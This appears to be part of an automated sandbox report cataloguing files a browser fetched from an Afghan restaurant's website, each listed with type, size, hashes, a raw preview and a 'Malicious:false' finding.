                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.png
                                                                                                                                                    Preview:.PNG........IHDR...p...K......].%....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=744, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 2000x843, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):178738
                                                                                                                                                    Entropy (8bit):7.959017314742458
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:dfyU51q/28uULO/tF3kcyzq/DXhJ8o71JqonsFS+9Z1He+nLUIJE:df18/28dO/tFNv9z+979E
                                                                                                                                                    MD5:485F72C7F783B651E5C901ACB8D7EAB4
                                                                                                                                                    SHA1:AC16241E548ECAA6946EBD1A89BD1084F1D72BED
                                                                                                                                                    SHA-256:ABFBBBDF882ACB6AED047D800092AF369253D1B74E85259C1BC58E18F91B9C24
                                                                                                                                                    SHA-512:E43EC7B90DE8BD173B9708F8024EF154E2FF709E7591874B8A907DB170DED2F129E318C29B1C3911D44F474F6C630621C20B9EE882560443F440C00C873BBF8C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....5Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:37:12.............0221..................................K...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......W.k.....sQmn......8.{...*.]o.Z.......k\.K..6.i..YA.{6I./..."A.....T
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 42672, version 1.0
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):42672
                                                                                                                                                    Entropy (8bit):7.993551568828384
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:pYHh9WEN+5jYuvlkL8sghJa1FQezYRRrz24Qrbfl1Qqs39bSuPTmN6NOZ5:2B9WgQjVKFQ4sIbrUB39uuKNqOZ5
                                                                                                                                                    MD5:313C8623838A8F431E533AC98EBDD9AD
                                                                                                                                                    SHA1:F0C53FFB6CD19E9AF37C7B60DF45C7C4E11AC796
                                                                                                                                                    SHA-256:A29A97013AD393D493ACB1E33515D103C2F6A2CF6634250FAF7CC176720A6135
                                                                                                                                                    SHA-512:247FAE49D012B7A710E64339FC9143D940342C03C31E8282C5FC51B1B8D9F912B583D5AB036A8D7A89EA612BD243F05C082CAFD055E744285F2F310140054DE1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLgiuE.woff2
                                                                                                                                                    Preview:wOF2..............T....=.................................J?HVAR.u.`?STATX'...:/L.....|..Z..v.0..T.6.$..h. ........[.<q....3..5.[.4..n..q...,M.. (F.8..... ....M*2f............gx.!S.0NY%.......c.!.R#.s\..Ht."BbyM...m0.V6..L......2...nre"...&....v.J..fd.T...6w+.8e]..."..d...z..2.._............g75.4Y...p-..Up.6....j............#......O|i.B.Z!oU.M...2:30......,.z..../:....'..L.K2W......]b...=qv.#.....r1!..<.K.Qq.b.*-..+@].F.*"P..W.~5..b<...4E.t._.<........1..C.B!.mJ..L.k]..N.Ru.P3....).$.#.{....9Z..........?...4Kt.7......u....u...m....!!.R...).. R...vy..t./..v8.....B8$.C..r.9.H..c{.m.c.7.w..6ME.G.(..Q..I... t........J.h......(!.%.2|1......c....x..6.6+.....?Wd.x.&..3.h`....L.o......k.[.G...]$.11:'..v7..q.N.Ls...?.x.........\...bE}H.P..q.u..J;....{..g....no..a..tJ...I..........T..;......).*..5`~..,..Z..s.%.."OK..G. ..2......=..c.`..Z.......?....u...&......x.R.:.X...............]._........jv.W...O.....l...."......Y...* ]UU.....tE.y6...$!..b^~Yi
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 328x910, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):76671
                                                                                                                                                    Entropy (8bit):7.882869668722342
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:usvwfco95svwfco9LLJ+ZMz0IcQ9V18zMJ1YEIzUIS+HhNeAr5nZtEG8ENl:usIfPjsIfPN8aQI3ozMJIzVS+BNeAlEM
                                                                                                                                                    MD5:459A65E6124932AFD38DC00C467CFDD7
                                                                                                                                                    SHA1:8B68A6459D5401E2957DCE5A9546E5F02D5F2A26
                                                                                                                                                    SHA-256:0509E48B56C81136DC11A2620BD748D31EBAABB41505AEBB210168851AB004EA
                                                                                                                                                    SHA-512:ED6B076DC25D19CE45D2F0DE9A9732D828C5042ADFDBEF071DBA8547AA3F9DF60E4FFE7E32678787357D7D0D107D0A4E575243F1D8B0A85705104F589C346BFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_1.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 17:00:26.............0221.......................H...........................................r...........z.(.................................&.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................:.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..OK...:..C.Bv=..Wjj.0....*.....e.}..2......!.{.%..s[u.....o.}d..I.^..^.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=768, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1024], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):72716
                                                                                                                                                    Entropy (8bit):7.8711415728233245
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:GmwFNmwFUduqZy1IskBChemAjj/k6AWBXxpPQj6G53krK4:sF7FlqZy1IBOBanAWHpYjh3M
                                                                                                                                                    MD5:A7C57A779ECFDA0407835813579EDED9
                                                                                                                                                    SHA1:1B76AD47968B39146397BB151CC7E5EED4D03C87
                                                                                                                                                    SHA-256:D63BF08B2F36AFA3AE325CFF119427936ACC87244BD785412A5D8D3E6ACB1258
                                                                                                                                                    SHA-512:074AC6F380CA63CAD1CEB2D79F98430C5736DD95EE1CA91C8FC4EE0EC15127924AEECFB1DAC1BC3361CAAD3D0CBFB0F75C404EF97832228AA9E621B6977F5BC5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:05:57.............0221...................................................................r...........z.(.................................1.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....n....%.Yciy....l*.....S..`x..R=Kt@t.....n->.r.....{..G$<.:...D.'..>.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=452, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=678], progressive, precision 8, 290x290, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):45010
                                                                                                                                                    Entropy (8bit):7.759942456411198
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:27gTLXbJa+p7t7gTLXbJa+1Fhs3+37rjEQQ4qZhoKARgFK0g6z:28TbbJvf8TbbJv1Fhs32jZmongc05z
                                                                                                                                                    MD5:8BC3CC9C180E9CE4E35131F18750BD30
                                                                                                                                                    SHA1:E9A715A0695FF52571B5EC5B84D08324EF559FCB
                                                                                                                                                    SHA-256:B5A919CC77821D06BEF18FF89348225A63D5AE7792095CA785EEE0A0FF6BC42A
                                                                                                                                                    SHA-512:177FA109F84A1C46B68B3219C43A3F5D2F65A24482CC4385DDB69555CD8F12668AD881D44F550FF579BBFD5E6FC17F3B568BF7ECC50F5A8212B7BDC3C41E7548
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/featured-image-02.jpg
                                                                                                                                                    Preview:....(.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 21:40:11.............0221......................."..........."...............................r...........z.(................................'L.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....l..T.)..7.P{..$..i.O.......`$....\..s..[.A#M..ecMSDn..C..!..V7!R.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 68 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19239
                                                                                                                                                    Entropy (8bit):3.531431490739003
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:1Sdb8kEWmdpMxNX7sc5wUZ6C+dI2wGzpFkIuo4n4RlO6klHXUAyTYonZF+ocN:1SKk6byXT+RwInkh4RlO/sTYoLPcN
                                                                                                                                                    MD5:32EFD231EC2B521AB43F26693D843E2F
                                                                                                                                                    SHA1:0C8F6089342BB5D64401092DA06734E3584DA664
                                                                                                                                                    SHA-256:3330034C4BC2DCBBCFB5D4714153E24F59A03029BD3F538D6776F7BFFA0EC088
                                                                                                                                                    SHA-512:A14D828E70AD94E05FF6621B83DB09C5B339F01F23F085FE83E23B603D38EF5A3936F1F6C1BFC58664A4BCB99AAC82E5184491D9FF5B2299E3BE180EF81EDF0F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...D...@............pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-18T12:26:05+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 90 x 86, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38060
                                                                                                                                                    Entropy (8bit):5.9412356661026635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:JgdDi7/U5Bxp7emU3WXvp7MwWi9hkt6Av3:SR7kUtWijavv3
                                                                                                                                                    MD5:EADA2A431DE19D55F58435C6CF098EE6
                                                                                                                                                    SHA1:77E4F36CBCE439AB91787C2FC7F46F92A10129B1
                                                                                                                                                    SHA-256:BCB24BBFAD81B005443651C553137907739135A3C41FBB77C3E4B58BF723DB42
                                                                                                                                                    SHA-512:4DCBD8A5CBC7C80DB3CD3B49E8EFDAD04FBB3F897AC8200D73854896AE3AEDF9C8C9344CD15E82D2AF4CD7FA6672723E499E740872F510A6BACEB6E73654F7AA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...Z...V.....Oj.y....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x467, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):87549
                                                                                                                                                    Entropy (8bit):7.9024625242595965
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:cXpyXpdhALs1/4NxJXlhFzJNTheQ4Ez1ftZksVOQ+LqvP6wZUrhnMpN:EeX0xRjNTsK1ft1VTzqw+r1ML
                                                                                                                                                    MD5:EBBCB35810CB9D14E5B080A7D1D5C516
                                                                                                                                                    SHA1:07BDC00460392473243CBE80E1D9693820E7E112
                                                                                                                                                    SHA-256:5DEF399EE4B272FC1B5079BD71D9C991C3FB3D2E46B5A8D94153212922E3AA6C
                                                                                                                                                    SHA-512:478FEC376CB5D5691915D917171C961C7651F3CA77180192CECA448803E6B3A065D52C8BDF45B1BD985C49C15B65AD47E947A254DB5BD1A9CDBE359DDF6EBC59
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....$.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 12:22:22.............0221...................................................................r...........z.(................................#........H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................k...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...C=.......{5.,.^..WV.mo.'.%..n....^1.h..=...Kw..jG....Z......}U....N...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):52
                                                                                                                                                    Entropy (8bit):4.407761238355061
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:OgGunSHnP20Tvi2pWnYn:O6SHPTTv1n
                                                                                                                                                    MD5:E221E72F447C96852835DD4D57F7601D
                                                                                                                                                    SHA1:45BADABE565D8025894F7A41983C384B2E75FCC9
                                                                                                                                                    SHA-256:9C643AA3E13E90818CE3D6E15F3611CA821050B0E368BD98C6C2DB4B45DEDF2A
                                                                                                                                                    SHA-512:565420AD0441719336824A672022C7D9870955D57A24434CD75A3C63E98F4332FC94671473D7E19F4F7C400F38C0097CE8F1039E092398FE96CAF06481AA063B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQmJbw1bXASZeBIFDZRU-s8SBQ2DqFs9EgUNSUCvSRIFDcZosPw=?alt=proto
                                                                                                                                                    Preview:CiQKBw2UVPrPGgAKBw2DqFs9GgAKBw1JQK9JGgAKBw3GaLD8GgA=
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=309, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=550], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):68922
                                                                                                                                                    Entropy (8bit):7.864406537417125
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:RNQNCY3IXdRrxyyiI+pM+2xAzVCoJ9Q1gDm4SOi:Ra4X3Zia8PJ9QCDm46
                                                                                                                                                    MD5:954FBB5B7016EE82B80C6FCD78A20190
                                                                                                                                                    SHA1:66F814C811773535422B25702E8E31679E3F52D7
                                                                                                                                                    SHA-256:B8D40DF2797FCA2B098A69A9C641B03F50AA4EBEEC78C3ABED16F5EEB637B816
                                                                                                                                                    SHA-512:4BF39F44378DB04603FD0D3723A35CBD541932B3EF96D2DC35D2B7FCA1275CFC61ACA19C2243D0E86B711F97332F2A8F1FCEBEE5A8D2239384B1AECD50952441
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/takAway_3.jpg
                                                                                                                                                    Preview:......Exif..MM.*...............&...........5...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:16:25.............0221...................................u...............................r...........z.(.................................V.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..+...!.;...;f....=..........[v4.kI.........cF.nT.....s..G...........M..m...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):211641
                                                                                                                                                    Entropy (8bit):7.9633049198511126
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:0SdISdsVWq59TNstIAxawenNW+7kMA7VnWAYAcuf047VkmPdnbQ8:9dpdsVTNNs+AoweW0GpWAiucmPpQ8
                                                                                                                                                    MD5:F4EEF5FB8DFD15A00A7013C3061B1E6D
                                                                                                                                                    SHA1:2D11707F426F79CB4D293B2421CB5BC4FC2F005F
                                                                                                                                                    SHA-256:A6FE3C68A77AEC73579473040274BDAF9A159AC13F07B3D919F3BB141F53388F
                                                                                                                                                    SHA-512:806027E90FBE522A7D4136D976686F34A8AFBC7C4F00F443D114C934A601EA0B2A83FB9B9E2511740CBDD8B2DFC6B8CA171942B6018623179F64B1989AB844BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-11.jpg
                                                                                                                                                    Preview:....3!Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:27:13.............0221...................................................................r...........z.(................................1........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..6.....0ID...t.).[KgY.....FUc@$...O..+..5..mc.$O.....Z=..O.I...........7
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (337)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):222911
                                                                                                                                                    Entropy (8bit):4.9595961999972635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:p5a6J9BUMJ6nHoBGi5fy0YVg4LvhMEq1U:p5CcY5zaEq1U
                                                                                                                                                    MD5:A9247B1FE21EE409D0B37E74100DE687
                                                                                                                                                    SHA1:7038343DE806C871E93D1681AB48633B7AA34F58
                                                                                                                                                    SHA-256:A55ADE67AEDF45A013CA01C5E93FA042D175348EF4D16F64CDE022BEEE9ABBD5
                                                                                                                                                    SHA-512:9A157E19EE19935EAB849366487A7B0830F8483997AA3C784D510CE22A2F91030B3DA04C10BCBD6F8ECDE3724EFDA5EC9917782B489FB466DA364D0D9F45E904
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/bootstrap/bootstrap.bundle.js
                                                                                                                                                    Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('jquery')) :. typeof define === 'function' && define.amd ? define(['exports', 'jquery'], factory) :. (global = global || self, factory(global.bootstrap = {}, global.jQuery));.}(this, function (exports, $) { 'use strict';.. $ = $ && $.hasOwnProperty('default') ? $['default'] : $;.. function _defineProperties(target, props) {. for (var i = 0; i < props.length; i++) {. var descriptor = props[i];. descriptor.enumerable = descriptor.enumerable || false;. descriptor.configurable = true;. if ("value" in descriptor) descriptor.writable = true;. Object.defineProperty(target, descriptor.key, descriptor);. }.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1161
                                                                                                                                                    Entropy (8bit):4.64351392466228
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:qQYDYkSzH1hhkKRvLfA45ObiW9zRRZDk/P:qQYDYNbhTJV02WR8P
                                                                                                                                                    MD5:3124898DC7820BA5D6708F9490E8D839
                                                                                                                                                    SHA1:D6763EAC3BF8F6B7CB82DAE50B2FC7EA1255CF8B
                                                                                                                                                    SHA-256:7D6A1CE440920134DB29C97F93C5DD089A6B2C1B86020EAA54CAB431D5B31C9C
                                                                                                                                                    SHA-512:93CAD1D8BB6FC239E280178EF4CB35C255E08826C5D72B2FFB9009912B4EE2E1481AE7B88CEE016B87D73FB8B497DB710600ECE7EF403993ACB3E099482378C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/js/foodhut.js
                                                                                                                                                    Preview:/*!.=========================================================.* FoodHut Landing page.=========================================================..* Copyright: 2019 DevCRUD (https://devcrud.com).* Licensed: (https://devcrud.com/licenses).* Coded by www.devcrud.com..=========================================================..* The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software..*/..// smooth scroll.$(document).ready(function(){. $(".navbar .nav-link").on('click', function(event) {.. if (this.hash !== "") {.. event.preventDefault();.. var hash = this.hash;.. $('html, body').animate({. scrollTop: $(hash).offset().top. }, 700, function(){. window.location.hash = hash;. });. } . });.});..new WOW().init();..function initMap() {. var uluru = {lat: 37.227837, lng: -95.700513};. var map = new google.maps.Map(documen
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):73690
                                                                                                                                                    Entropy (8bit):7.234803756768176
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XYRut0mTUsdxBi/aaeLxyVBFbpqGxkDE2J76u38IGnf:limIsjca+BF8ikDE2p6q8X
                                                                                                                                                    MD5:D82C4DB1A08878F5ED0BBE7822DC6BF5
                                                                                                                                                    SHA1:3F2D40DB5C942E85B9AB709788906D356DB5FB73
                                                                                                                                                    SHA-256:3C8ED041C9F48B2A4EE8BB4C0E7EDCD40CA93E9BB00140D42DF25D4B702248B1
                                                                                                                                                    SHA-512:C4D556BFE384FA3315316E2F145416BB4E210A42CE01B3B3EE2D72DDDADF1D80959BB08DE1B84044361C38B365C11121473F39360EF0C5F8369466E938BA5C75
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:1c5c4c66-0cfd-11ed-86e7-ddf6a1902901</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:00f813a9-2023-bf
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JSON data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3
                                                                                                                                                    Entropy (8bit):1.584962500721156
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:P:P
                                                                                                                                                    MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                    SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                    SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                    SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:{}.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 141 x 75, 8-bit/color RGBA, non-interlaced
